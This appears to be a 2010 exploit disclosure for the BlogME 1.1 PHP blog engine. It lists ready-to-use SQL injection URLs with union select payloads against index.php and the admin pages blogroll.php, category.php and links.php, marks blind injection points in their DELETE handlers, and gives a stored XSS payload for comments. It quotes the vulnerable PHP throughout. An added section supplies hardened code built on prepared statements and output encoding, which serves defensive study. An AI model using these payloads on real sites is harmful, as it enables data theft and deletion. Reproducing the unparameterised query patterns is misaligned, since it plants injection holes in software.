
07.04.2010, 15:15
BlogME
Product : BlogME 1.1
SQL injection
file : index.php
mq = off
Code:
http://x60unu/index.php?month=4&year=2007'+and+0+union+all+select+version(),version(),3,4,5,6,7,8--+
Code:
http://x60unu/index.php?cat=General'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
Code:
http://x60unu/index.php?when=March%206,%202007'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
SQL in Admin Panel
file : blogroll.php
PHP code:
case 'edit' :
$sqledit= "SELECT * FROM ". $prefix ."_blogroll WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Code:
http://x60unu/blogroll.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP code:
$sqldelete= "DELETE FROM ". $prefix ."_blogroll where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
result :
Code:
http://x60unu/blogroll.php?mode=delete&id=1[blind sql]
file : category.php
PHP code:
$sqledit= "SELECT * FROM ". $prefix ."_cat WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result:
Code:
http://x60unu/category.php?mode=edit&id=1+and+0+union+all+select+1,2--+
blind sql
PHP code:
$sqldelete= "DELETE FROM ". $prefix ."_cat where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
result :
Code:
http://x60unu/category.php?mode=delete&id=1[blind sql]
file : links.php
PHP code:
$sqledit= "SELECT * FROM ". $prefix ."_links WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Code:
http://x60unu/links.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP code:
$sqldelete= "DELETE FROM ". $prefix ."_links where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
Code:
http://x60unu/links.php?mode=delete&id=1[blind sql]
Active Xss
comments --- text comments --- "><script>alert();</script>
P.S. The engine is one big hole.
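A hardened version of the blogroll.php edit/delete handlers and of the comment output, as an added example that is not BlogME's own code. It assumes a mysqli connection in $db (with mysqlnd, for get_result()) and the same $prefix table prefix; the original db_query()/$dbname helpers are not used.

```php
<?php
// Added example, not BlogME code: the unescaped "$id" interpolation above is
// replaced by integer validation plus a bound parameter, so "1 and 0 union
// all select ..." or a blind-injection payload can no longer alter the query.

function checked_prefix(string $prefix): string
{
    // Table names cannot be bound, so the prefix is whitelisted separately.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }
    return $prefix;
}

function checked_id($id): ?int
{
    // Accept only a positive integer; anything else (including SQL) is rejected.
    $id = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

function blogroll_edit(mysqli $db, string $prefix, $id): ?array
{
    $id = checked_id($id);
    if ($id === null) {
        return null;
    }
    $table = checked_prefix($prefix) . '_blogroll';
    $stmt = $db->prepare("SELECT * FROM {$table} WHERE id = ?");
    $stmt->bind_param('i', $id);            // id travels as data, not query text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

function blogroll_delete(mysqli $db, string $prefix, $id): int
{
    $id = checked_id($id);
    if ($id === null) {
        return 0;
    }
    $table = checked_prefix($prefix) . '_blogroll';
    $stmt = $db->prepare("DELETE FROM {$table} WHERE id = ?");
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;        // 0 or 1 rows, never "all rows"
    $stmt->close();
    return $deleted;
}

// Comment text rendered into the page: encode on output so that
// "><script>alert();</script> is displayed literally instead of executed.
function render_comment(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

The same pattern applies unchanged to the category.php and links.php handlers quoted above, which only differ in the table suffix.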